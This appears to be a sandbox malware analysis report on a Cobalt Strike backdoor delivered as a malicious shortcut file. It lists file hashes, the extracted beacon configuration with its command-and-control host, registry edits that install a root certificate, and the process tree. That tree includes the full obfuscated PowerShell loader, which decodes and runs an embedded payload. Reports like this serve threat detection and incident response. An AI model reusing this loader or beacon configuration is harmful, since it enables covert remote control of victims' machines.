cobaltstrike | e2945268c976f8dc33ba9a8d1a804f00cff46aabc01cd3196651322a71863b87

Analysis

max time kernel
151s
max time network
47s
platform
windows7_x64
resource
win7v20201028
submitted
26-12-2020 20:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ds7002.lnk
Size

392KB
MD5

6ed0020b0851fb71d5b0076f4ee95f3c
SHA1

e431261c63f94a174a1308defccc674dabbe3609
SHA256

2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
SHA512

2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3

Score

10^/10

cobaltstrike backdoor trojan

Malware Config

Extracted

Family

cobaltstrike

http://pandorasong.com:443/access/

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
pandorasong.com,/access/
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
4352
maxdns
255
month
0
pipe_name
\\%s\pipe\msagent_%x
polling_time
300000
port_number
443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
7.382016e+08
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.350256387e+09
uri
/radio/xmlrpc/v45
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
year
0

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

7 1092 rundll32.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1092 rundll32.exe

flow	pid	process
7	1092	rundll32.exe

pid	process
1092	rundll32.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	rundll32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	rundll32.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe

pid process

2016 powershell.exe
2016 powershell.exe
2016 powershell.exe
2016 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

1824 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2016 powershell.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

AcroRd32.exe

pid process

1824 AcroRd32.exe
1824 AcroRd32.exe
1824 AcroRd32.exe
1824 AcroRd32.exe

pid	process
2016	powershell.exe
2016	powershell.exe
2016	powershell.exe
2016	powershell.exe

pid	process
1824	AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	2016	powershell.exe

pid	process
1824	AcroRd32.exe
1824	AcroRd32.exe
1824	AcroRd32.exe
1824	AcroRd32.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

cmd.exepowershell.execsc.execsc.exe

description	pid	process	target process
PID 1048 wrote to memory of 2016	1048	cmd.exe	powershell.exe
PID 1048 wrote to memory of 2016	1048	cmd.exe	powershell.exe
PID 1048 wrote to memory of 2016	1048	cmd.exe	powershell.exe
PID 2016 wrote to memory of 1468	2016	powershell.exe	csc.exe
PID 2016 wrote to memory of 1468	2016	powershell.exe	csc.exe
PID 2016 wrote to memory of 1468	2016	powershell.exe	csc.exe
PID 1468 wrote to memory of 1328	1468	csc.exe	cvtres.exe
PID 1468 wrote to memory of 1328	1468	csc.exe	cvtres.exe
PID 1468 wrote to memory of 1328	1468	csc.exe	cvtres.exe
PID 2016 wrote to memory of 340	2016	powershell.exe	csc.exe
PID 2016 wrote to memory of 340	2016	powershell.exe	csc.exe
PID 2016 wrote to memory of 340	2016	powershell.exe	csc.exe
PID 340 wrote to memory of 432	340	csc.exe	cvtres.exe
PID 340 wrote to memory of 432	340	csc.exe	cvtres.exe
PID 340 wrote to memory of 432	340	csc.exe	cvtres.exe
PID 2016 wrote to memory of 1824	2016	powershell.exe	AcroRd32.exe
PID 2016 wrote to memory of 1824	2016	powershell.exe	AcroRd32.exe
PID 2016 wrote to memory of 1824	2016	powershell.exe	AcroRd32.exe
PID 2016 wrote to memory of 1824	2016	powershell.exe	AcroRd32.exe
PID 2016 wrote to memory of 1092	2016	powershell.exe	rundll32.exe
PID 2016 wrote to memory of 1092	2016	powershell.exe	rundll32.exe
PID 2016 wrote to memory of 1092	2016	powershell.exe	rundll32.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1468

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B5B.tmp" "c:\Users\Admin\AppData\Local\Temp\gkhq2szw\CSC8CF4C778B25428885EF4C7F50B9CE52.TMP"
4⤵
PID:1328

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:340

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C07.tmp" "c:\Users\Admin\AppData\Local\Temp\afkxno03\CSC44D10F4CAF2E4BCCB8FE2B3530CB558C.TMP"
4⤵
PID:432

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"
3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1824

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Modifies system certificate store
PID:1092

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES3B5B.tmp
MD5
9ce87fcc9ac0d30aad3c1cc2f8fe9725

SHA1
76fc443aef1f78529027f3a3c13ee9b692e975b9

SHA256
0b7a6cd56792238b652e7e12f441cbf93a28bba9b218904b8b8278c82c35ec68

SHA512
a78a713ab1192cd6e9591ab7b6de50385b80b7448ccdc094e19c3cc613e1735e0ef88f798cd5762766c49ef3712339873b7a7a80ab047f8cde1041d7c176a4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3C07.tmp
MD5
70c5ceb9b18d9423be49dbbd47f249eb

SHA1
b1b0aed8831f1cea9f34f63baa387c41ce9a9ea0

SHA256
86c5393793a1ea7fdb572aa9af0300cacbcc7684d4d1de191e4b47d36d9295f1

SHA512
a39a755f5718722046b139f0e49cc50feec833f5a082158cefe6170a2715cbbe7f74d60f9cf13565cdac03ba91b58fd76c28d05ba7126843d15e3313ef6fb422

Download Submit
C:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.dll
MD5
75131e6de34693b469c8ac4d95db71c2

SHA1
d7f3c2df82ed5f1c92226b13a7f4599591a835db

SHA256
5ef4ddd82f4c0f00102a11910a1916121c66ba59acb6412fd92287fbe17fe702

SHA512
acd68554d5638422b01e941f9415adfed944680916ff874d0cf9dc81f0075a118b783055dfbd19336c6d05d5fdf7b1294721668c925da1e357d166f66af7664e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ds7002.PDF
MD5
313f4808aa2a2073005d219bc68971cd

SHA1
053fb60530e884851eb8b6aebbec4570ec788d4a

SHA256
b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1

SHA512
1d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d

Download Submit
C:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.dll
MD5
2cc581106f4fb709652a076a98be5cab

SHA1
751583b188952b5cb82702f6d1fe77909492fd07

SHA256
4f45532f439329c3903d95ca98f608fe162dd5837ee96be6d229b7465ff7c867

SHA512
62e31ac227ffae973be5b77940d763b94582a313e4444c457fc8bfcc3228c42eec79f0d626be231c5c0f034ccb5de30b4b2b13932ae49cc94f42aeb7c4806382

Download Submit
C:\Users\Admin\AppData\Local\cyzfc.dat
MD5
16bbc967a8b6a365871a05c74a4f345b

SHA1
9858d5cb2a6614be3c48e33911bf9f7978b441bf

SHA256
b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05

SHA512
68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\CSC44D10F4CAF2E4BCCB8FE2B3530CB558C.TMP
MD5
f0dae506cb4b6a151d20c3ef92994bc6

SHA1
fec248adb94d4e694bf7917ebed255253916336a

SHA256
f5aba728e2c829652008f0a4363bdff20a56e75cd18cb63cfeea3ea128aa04ae

SHA512
5c02eff30fa7409abbcb88a86cfd4188e9f5dddd97bd5295e8c5d2e253b52305d4b0219354e431fdcbf04a33c273106624603256fdc9c91245055ef728b1f71b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.0.cs
MD5
171a88ab4fad87acfd2e5032eb0c6113

SHA1
754de0e7656c558d335710fc41cbf196d39c1a19

SHA256
5473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6

SHA512
87ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.cmdline
MD5
d683f5d5b34b38854af2717581282ea1

SHA1
1652f310ddbfc1096be76c3b881ec6a1d9c47325

SHA256
07891ed2e8e22e93d569d9febbb17e78242d0490c1f211184662d1db40741037

SHA512
2ba5f26cda0563aa23f9525faf65ef6b76f703e8896f43b6653765139c4a950da3ec15634e3196ca736625cfa25ea8233054e86f9566623653fa7ce76bf1b50c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\CSC8CF4C778B25428885EF4C7F50B9CE52.TMP
MD5
01740e75e51dc0746ce28a43c042c62e

SHA1
cf76dbc305f364b6a55adf1e7a0d72ab38771ae7

SHA256
21af03fd27d47acc91cb5e592ba1aab85ee1ad6856ba43aba832405c88425906

SHA512
7eeb3780d78689a256717eacb418f2820b4494aca1900ba7a0a46dc615e2b871937c8482d509440c06cef91e90e865cec63280c5ea4f439293b5ce2ad400874e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.0.cs
MD5
cdcb629e6587254315606a6ba3764745

SHA1
d5b706ca48b7af8926926e80565148f725c75393

SHA256
3c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55

SHA512
29f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.cmdline
MD5
c7991200eb269f2a338993f25b75eb66

SHA1
b6ff8f448b4411641b980fd9344299c6e33dc9ac

SHA256
a2dfb9828a7bc5a669e4d62672c79c3727cb3269a6c9da82a4a5d0016f0de1cc

SHA512
c1fbf76b2d91bea096c89c9a55f981709fa3b47cfd59e3c20429aa28ac0d253dfd067567000005a7cb69ee5a2595b1370a90d34711955a965b5ff4aef256e61f

Download Submit
\Users\Admin\AppData\Local\cyzfc.dat
MD5
16bbc967a8b6a365871a05c74a4f345b

SHA1
9858d5cb2a6614be3c48e33911bf9f7978b441bf

SHA256
b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05

SHA512
68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99

Download Submit
memory/340-18-0x0000000000000000-mapping.dmp

Download
memory/432-21-0x0000000000000000-mapping.dmp

Download
memory/1092-32-0x0000000001B90000-0x0000000001C0E000-memory.dmp

Filesize
504KB

Download
memory/1092-31-0x0000000000320000-0x0000000000360000-memory.dmp

Filesize
256KB

Download
memory/1092-27-0x0000000000000000-mapping.dmp

Download
memory/1328-13-0x0000000000000000-mapping.dmp

Download
memory/1468-10-0x0000000000000000-mapping.dmp

Download
memory/1824-26-0x0000000000000000-mapping.dmp

Download
memory/2016-5-0x000000001AA60000-0x000000001AA61000-memory.dmp

Filesize
4KB

Download
memory/2016-4-0x0000000002560000-0x0000000002561000-memory.dmp

Filesize
4KB

Download
memory/2016-9-0x000000001C320000-0x000000001C321000-memory.dmp

Filesize
4KB

Download
memory/2016-25-0x000000001A9A0000-0x000000001A9A1000-memory.dmp

Filesize
4KB

Download
memory/2016-7-0x000000001A7E0000-0x000000001A7E1000-memory.dmp

Filesize
4KB

Download
memory/2016-8-0x000000001C250000-0x000000001C251000-memory.dmp

Filesize
4KB

Download
memory/2016-17-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/2016-3-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

Filesize
9.9MB

Download
memory/2016-2-0x0000000000000000-mapping.dmp

Download
memory/2016-6-0x0000000002720000-0x0000000002721000-memory.dmp

Filesize
4KB

Download